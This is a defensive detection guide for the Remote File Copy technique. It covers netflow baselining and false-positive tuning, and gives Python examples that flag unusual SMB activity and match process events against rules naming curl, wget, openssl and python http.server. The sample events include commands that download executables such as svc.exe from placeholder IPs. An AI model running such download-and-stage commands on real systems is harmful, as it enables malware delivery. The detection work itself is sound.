MITRE’s data sources
- File monitoring
- Packet capture
- Process use of network
- Netflow/Enclave netflow
- Network protocol analysis
- Process monitoring
In addition to those data sources listed by MITRE ATT&CK, security teams should consider collecting from the following log sources:
- Firewall logs
- Database logs
- Email logs
Netflow/Enclave netflow and network protocol analysis
Network protocol analysis and netflow have the best chance of detecting remote file transfers because, by definition, a Remote File Copy must traverse the network.
Process monitoring serves as an excellent supplement to network-based monitoring. Because it is host-based, this data source isn't as easily affected by the evasion techniques that adversaries often use to subvert network-based security technologies, such as encryption or the misuse of network protocols.
You’ll want to establish a baseline for expected network activity and then alert on deviations from that baseline, based on:
- Source and destination pairs
- Data volume
- Other network traffic characteristics
This has been particularly effective in detecting data exfiltration. As an example, Red Canary has detected more than 1,000 confirmed threats this year through detection and analysis of an excessive number of SMB sessions.
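As an added example of the baseline-and-alert approach described above (this is illustration code written for this page, not Red Canary’s detection logic), the following Python compares each host’s SMB session count for one observation window against that host’s own history and also flags a host that fans out to many SMB destinations. The flow records and the per-host history are constructed for the example, and treating every flow to TCP/445 as one SMB session is a simplifying assumption.

```python
from collections import defaultdict
from statistics import mean, pstdev

SMB_PORT = 445

# Constructed netflow-style records for one observation window (not real traffic):
# (src_ip, dst_ip, dst_port, bytes_out). Each record to TCP/445 is treated as one
# SMB session, an assumption made for this example.
SAMPLE_FLOWS = [
    ("10.0.1.5", "10.0.2.10", 445, 4000),
    ("10.0.1.5", "10.0.2.10", 445, 2500),
    ("10.0.1.5", "10.0.2.30", 443, 90000),
] + [
    # one workstation fanning out to twelve different hosts over SMB
    ("10.0.1.8", f"10.0.2.{n}", 445, 1000) for n in range(11, 23)
]

# Constructed history: SMB sessions per window for the previous seven windows.
BASELINE_HISTORY = {
    "10.0.1.5": [2, 3, 2, 4, 3, 2, 3],
    "10.0.1.8": [1, 0, 2, 1, 1, 0, 1],
}


def smb_stats(flows, port=SMB_PORT):
    """Per source host: (number of SMB flows, number of distinct SMB destinations)."""
    sessions = defaultdict(int)
    destinations = defaultdict(set)
    for src, dst, dport, _ in flows:
        if dport == port:
            sessions[src] += 1
            destinations[src].add(dst)
    return {host: (sessions[host], len(destinations[host])) for host in sessions}


def unusual_smb_hosts(flows, history, sigma=3.0, min_sessions=5, min_destinations=5):
    """Hosts whose SMB activity exceeds their own baseline.

    A host is flagged when its session count is above max(min_sessions,
    mean + sigma * stdev) of its history, or when it reaches at least
    min_destinations distinct SMB targets in one window. The absolute floors
    keep a quiet host (mean 1, stdev near 0) from alerting on its second
    session, and give a host with no history a threshold at all.
    """
    alerts = []
    for host, (count, ndest) in sorted(smb_stats(flows).items()):
        past = history.get(host, [])
        threshold = min_sessions
        if len(past) >= 2:
            threshold = max(min_sessions, mean(past) + sigma * pstdev(past))
        reasons = []
        if count > threshold:
            reasons.append(f"{count} SMB sessions vs. baseline threshold {threshold:.1f}")
        if ndest >= min_destinations:
            reasons.append(f"{ndest} distinct SMB destinations")
        if reasons:
            alerts.append({"host": host, "sessions": count,
                           "destinations": ndest, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in unusual_smb_hosts(SAMPLE_FLOWS, BASELINE_HISTORY):
        print(alert["host"], "; ".join(alert["reasons"]))
```

With the constructed data, 10.0.1.5 stays inside its baseline while 10.0.1.8 trips both the session-count and the fan-out checks. The per-host history is the part that makes this tunable: the same twelve sessions from a file server with a history in the hundreds would not alert.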
In terms of process data, there are a number of operating system-level tools that can transfer files but are unusual mechanisms for doing so. Some examples include:
- Python’s built-in web server module paired with curl
- OpenSSL’s s_client and s_server used as an encrypted file transfer channel
Examining telemetry for these unusual events can be an effective way to detect malicious Remote File Copies. That said, most adversaries will only resort to these unusual mechanisms if more typical ones, such as File Transfer Protocol (FTP) or secure copy (SCP), are not available.
In addition, any non-native applications that establish network connections should be viewed with suspicion. The nearly 200 threats that MITRE ATT&CK lists for this technique include numerous examples that may be detectable in this way.
Weeding out false positives
False positive rates for detecting malicious Remote File Copying will vary widely from one environment to the next. For example, a public FTP server might generate an excessive number of alerts for suspicious FTP connections, so analytics based on any data source will need to be tuned for the environment in which they’re deployed. In some environments, connections to network printers may skew the expected network connections of system processes such as Notepad (for instance, when a user prints from it).
The two data sources suggested above (network and process data) probably have the greatest capacity to generate false positives if you fail to tune them. In general, process data is easier to tune, since it tends to include more context (e.g., user context, frequency analysis, and process ancestry) that can be used to determine behavior and intent.
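The following Python is an added example, not code from the original post or from any vendor’s rule set, that ties together the process-data detection of unusual file transfer tools described earlier (the Python web server, curl and OpenSSL cases) and the tuning advice in this section. It matches process events against a small set of rules, then uses the context process data carries (user, parent process and how many hosts ran the same command line) to suppress allowlisted activity, downgrade commands that are common across the environment, and escalate transfers spawned by server or Office processes. The process events, the allowlist, the rule patterns, the list of service parents and the prevalence threshold are all this example’s own constructed choices.

```python
import re
from collections import defaultdict

# Detection rules as (name, process image basenames, command-line pattern).
# The patterns are this example's own, not a vendor rule set.
TRANSFER_RULES = [
    ("python_http_server", {"python", "python2", "python3"},
     re.compile(r"http\.server|SimpleHTTPServer")),
    ("curl_file_transfer", {"curl"},
     re.compile(r"(?:^|\s)(?:-o|-O|--output|-T|--upload-file)\b")),
    ("wget_download", {"wget"}, re.compile(r"\b(?:https?|ftp)://")),
    ("openssl_tunnel", {"openssl"}, re.compile(r"\bs_(?:client|server)\b")),
]

# Parents that have no business launching file-transfer tooling: a web server,
# database or Office process spawning curl is far more suspicious than an
# interactive shell doing so. Assumed list for this example.
SERVICE_PARENTS = {"w3wp", "httpd", "nginx", "tomcat", "sqlservr",
                   "winword", "excel", "outlook"}

# Constructed process events (not real telemetry). 203.0.113.0/24 is a
# documentation range.
SAMPLE_EVENTS = [
    {"host": "ws01", "user": "CORP\\alice", "parent": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Python39\\python.exe", "cmdline": "python -m http.server 8080"},
    {"host": "web01", "user": "IIS APPPOOL\\DefaultAppPool",
     "parent": "C:\\Windows\\System32\\inetsrv\\w3wp.exe",
     "image": "C:\\Windows\\System32\\curl.exe",
     "cmdline": "curl -o C:\\Windows\\Temp\\svc.exe http://203.0.113.5/svc.exe"},
    {"host": "build01", "user": "svc-build", "parent": "/bin/bash", "image": "/usr/bin/curl",
     "cmdline": "curl -o artifact.tgz https://artifacts.corp.example/build/123.tgz"},
    {"host": "srv02", "user": "root", "parent": "/bin/bash", "image": "/usr/bin/openssl",
     "cmdline": "openssl s_server -quiet -port 4433 -cert c.pem -key k.pem"},
    {"host": "ws03", "user": "CORP\\carol",
     "parent": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "image": "C:\\Tools\\wget.exe",
     "cmdline": "wget.exe http://203.0.113.9/update.bin -O update.bin"},
    {"host": "ws02", "user": "CORP\\bob", "parent": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\notepad.exe", "cmdline": "notepad.exe notes.txt"},
] + [
    # the same certificate check run by admins on three hosts
    {"host": h, "user": "admin", "parent": "/bin/bash", "image": "/usr/bin/openssl",
     "cmdline": "openssl s_client -connect ldap.corp.example:636 -showcerts"}
    for h in ("adm01", "adm02", "adm03")
]

# Environment-specific tuning: (user, rule) pairs known to be benign here.
ALLOWLIST = {("svc-build", "curl_file_transfer")}


def image_name(path):
    """Basename of an image path, lower-cased, without a .exe suffix."""
    name = re.split(r"[\\/]", path)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name


def match_rule(event):
    """Return the name of the first rule the process event matches, or None."""
    image = image_name(event["image"])
    for name, images, pattern in TRANSFER_RULES:
        if image in images and pattern.search(event["cmdline"]):
            return name
    return None


def triage(events, allowlist, common_hosts=3):
    """Classify rule hits using the context that process data carries.

    Allowlisted (user, rule) pairs are 'suppressed'; hits with a service or
    Office parent are 'high'; an identical command line seen on at least
    `common_hosts` hosts is 'low' (likely admin or build tooling); everything
    else is 'medium'. Returns one (host, rule, severity) tuple per hit.
    """
    hits = [(event, rule) for event in events if (rule := match_rule(event))]
    # Frequency analysis: how many distinct hosts ran this exact command line?
    prevalence = defaultdict(set)
    for event, rule in hits:
        prevalence[(rule, event["cmdline"])].add(event["host"])

    findings = []
    for event, rule in hits:
        if (event["user"], rule) in allowlist:
            severity = "suppressed"
        elif image_name(event["parent"]) in SERVICE_PARENTS:
            severity = "high"
        elif len(prevalence[(rule, event["cmdline"])]) >= common_hosts:
            severity = "low"
        else:
            severity = "medium"
        findings.append((event["host"], rule, severity))
    return findings


def actionable(findings):
    """The findings an analyst should look at, highest severity first."""
    rank = {"high": 0, "medium": 1}
    return sorted((f for f in findings if f[2] in rank), key=lambda f: rank[f[2]])


if __name__ == "__main__":
    for host, rule, severity in actionable(triage(SAMPLE_EVENTS, ALLOWLIST)):
        print(f"{severity:6} {host:8} {rule}")
```

The ordering of the checks is deliberate: ancestry outranks prevalence, so a curl launched by w3wp.exe stays high-severity even if the same command line turned up on several web servers, whereas the admins’ identical s_client certificate check on three hosts is downgraded rather than dropped. Notepad never reaches the rules because no rule names it, which is the process-data equivalent of the printer caveat above: the tuning problem there is on the network side, not in process telemetry.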